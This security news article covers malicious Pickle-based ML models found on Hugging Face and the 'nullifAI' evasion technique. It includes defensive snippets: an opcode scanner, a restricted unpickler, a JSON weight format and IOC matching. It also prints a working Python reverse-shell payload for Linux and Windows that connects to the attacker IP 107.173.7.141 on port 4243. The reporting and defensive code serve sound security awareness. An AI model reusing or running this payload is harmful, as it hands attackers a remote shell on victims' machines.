Developers Beware! Malicious ML Models Detected on Hugging Face Platform

In a concerning development for the machine learning community, researchers at ReversingLabs have identified malicious models on the popular Hugging Face platform.



These models exploit vulnerabilities in the Pickle file serialization format, a widely used method for storing and sharing machine learning data.

The discovery highlights the growing security risks associated with collaborative AI platforms and underscores the need for vigilance among developers.

Pickle is a Python module used for serializing and deserializing Python objects.

While convenient, it poses significant security risks due to its ability to execute arbitrary Python code during deserialization.

Researchers at ReversingLabs noted that attackers can exploit this behavior to embed malicious payloads within seemingly innocuous ML models.

```python
# Example of a malicious Pickle file
import pickle

# Malicious payload
payload = """
RHOST="107.173.7.141";RPORT=4243;
from sys import platform
if platform != 'win32':
    import threading
    def a():
        import socket, pty, os
        s=socket.socket();s.connect((RHOST,RPORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")
    threading.Thread(target=a).start()
else:
    import os, socket, subprocess, threading, sys
    def s2p(s, p):
        while True:p.stdin.write(s.recv(1024).decode()); p.stdin.flush()
    def p2s(s, p):
        while True:s.send(p.stdout.read(1).encode())
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    while True:
        try: s.connect(("107.173.7.141", 4243)); break
        except: pass
    p=subprocess.Popen(["powershell.exe"],
        stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)
    threading.Thread(target=s2p, args=[s,p], daemon=True).start()
    threading.Thread(target=p2s, args=[s,p], daemon=True).start()
    p.wait()
"""

# Serialize the payload
# Note: as written, this only pickles the payload text as a string, so loading
# malicious.pkl returns that string and does not execute it.
serialized_payload = pickle.dumps(payload)

# Save to a file
with open('malicious.pkl', 'wb') as f:
    f.write(serialized_payload)
```

The Discovery

ReversingLabs researchers identified two models on Hugging Face that contained malicious code, using an evasion technique they dubbed “nullifAI.”

These models were stored in PyTorch format, which is essentially a compressed Pickle file. The malicious payload was inserted at the beginning of the Pickle stream, so it executed before deserialization reached the broken remainder of the stream. This allowed the models to evade detection by Hugging Face’s security tools.
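A payload placed at the start of a stream can matter even when the rest of the file does not parse. The following is a minimal sketch of a static check, not the tooling used by ReversingLabs or Hugging Face. It assumes the raw Pickle bytes have already been extracted from the model archive, and the function name `list_pickle_imports` is hypothetical. It relies on the standard library's `pickletools.genops`, which walks opcodes without executing them, and it keeps whatever imports were seen before a parse error. The handling of `STACK_GLOBAL` is a heuristic that takes the two most recent string operands.

```python
import pickle
import pickletools


def list_pickle_imports(data: bytes):
    """Walk the opcodes of a pickle stream without executing it.

    Returns (imports, error): the (module, name) pairs referenced before the
    stream ended or broke, and the parse error if one occurred (else None).
    """
    imports = []
    recent_strings = []  # string operands seen so far, used for STACK_GLOBAL
    error = None
    try:
        for opcode, arg, _pos in pickletools.genops(data):
            if opcode.name in ("GLOBAL", "INST"):
                # arg has the form "module name", separated by one space
                module, _, name = arg.partition(" ")
                imports.append((module, name))
            elif opcode.name == "STACK_GLOBAL":
                # Heuristic: module and name are the two latest string operands
                if len(recent_strings) >= 2:
                    imports.append((recent_strings[-2], recent_strings[-1]))
            elif isinstance(arg, str):
                recent_strings.append(arg)
    except Exception as exc:  # truncated or corrupted stream
        error = exc
    return imports, error
```

For example, on the bytes from `pickle.dumps(print, protocol=4)` with the final STOP byte removed, the function still reports `('builtins', 'print')` and returns a `ValueError` alongside it. A reviewer could then compare the reported imports against a list of modules that a model file has no reason to reference.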

The use of Pickle files on collaborative platforms like Hugging Face poses significant security risks.

Since Pickle allows arbitrary code execution, malicious models can be crafted to execute harmful commands on unsuspecting systems.

This vulnerability is exacerbated by the fact that many developers prioritize productivity over security, leading to widespread use of Pickle despite its risks.
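Where Pickle cannot be avoided, one mitigation described in the Python documentation is to restrict which globals the unpickler may resolve. The sketch below follows that pattern. The allow-list `SAFE_BUILTINS` and the helper name `restricted_loads` are illustrative choices, not something taken from the ReversingLabs report, and a real model loader would need a carefully reviewed allow-list of its own.

```python
import builtins
import io
import pickle

# Illustrative allow-list for this sketch; adjust to the types your data needs.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve globals outside the allow-list."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        # Everything else (os.system, builtins.exec, ...) is rejected
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads(), but only allow-listed globals can be imported."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

With this loader, `restricted_loads(pickle.dumps([1, 2, range(3)]))` returns the list, while `restricted_loads(pickle.dumps(print))` raises `pickle.UnpicklingError` because `builtins.print` is not on the allow-list. This reduces the attack surface but does not make untrusted Pickle data safe in general.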

Developers must remain vigilant and consider alternative, safer serialization formats.
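As a rough illustration of what a data-only format looks like, the sketch below stores named weights as JSON using only the standard library. The function names and the dictionary layout are assumptions made for this example. Real projects would more likely use a purpose-built tensor format such as safetensors, but the principle is the same: the loader builds plain data and never imports or calls anything named in the file.

```python
import json


def _is_number_tree(value):
    """True for a number or arbitrarily nested lists of numbers."""
    if isinstance(value, bool):
        return False
    if isinstance(value, (int, float)):
        return True
    return isinstance(value, list) and all(_is_number_tree(v) for v in value)


def weights_to_json(weights):
    """Serialize a mapping of name -> nested lists of numbers."""
    return json.dumps(weights)


def weights_from_json(text):
    """Parse and validate weights; json.loads only builds plain data types."""
    data = json.loads(text)
    if not isinstance(data, dict) or not all(_is_number_tree(v) for v in data.values()):
        raise ValueError("expected an object mapping names to nested lists of numbers")
    return data
```

A mapping such as `{"layer1.bias": [0.1, 0.2]}` round-trips unchanged, and anything that is not a mapping of names to numbers is rejected with `ValueError`.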

Hugging Face has taken steps to enhance its security measures, but the inherent risks associated with Pickle files show the need for ongoing vigilance and innovation in securing AI platforms.

Developers are advised to be cautious when using Pickle files and to monitor their systems for suspicious activity related to the IOCs listed below.

Indicators of Compromise (IOCs)

- Malicious IP Addresses: 107.173.7.141
- Port Numbers: 4243
- Malicious File Formats: Compressed Pickle files in PyTorch format.
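Monitoring for the network IOCs above could be sketched as follows. The input format, an iterable of `(remote_ip, remote_port)` pairs, and the function name `match_iocs` are assumptions for this example. How the connection records are gathered (firewall logs, netstat output, an EDR export) is left open.

```python
# IOC values copied from the list above.
IOC_IPS = {"107.173.7.141"}
IOC_PORTS = {4243}


def match_iocs(connections):
    """Return (ip, port, port_matches) for every connection to a listed IP.

    `connections` is an iterable of (remote_ip, remote_port) pairs.
    `port_matches` is True when the port is also on the IOC list.
    """
    hits = []
    for ip, port in connections:
        if ip in IOC_IPS:
            hits.append((ip, port, port in IOC_PORTS))
    return hits
```

The sketch matches on the IP address and only annotates the port, since a port number on its own is too common to be a reliable signal.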

The post Developers Beware! Malicious ML Models Detected on Hugging Face Platform appeared first on Cyber Security News.
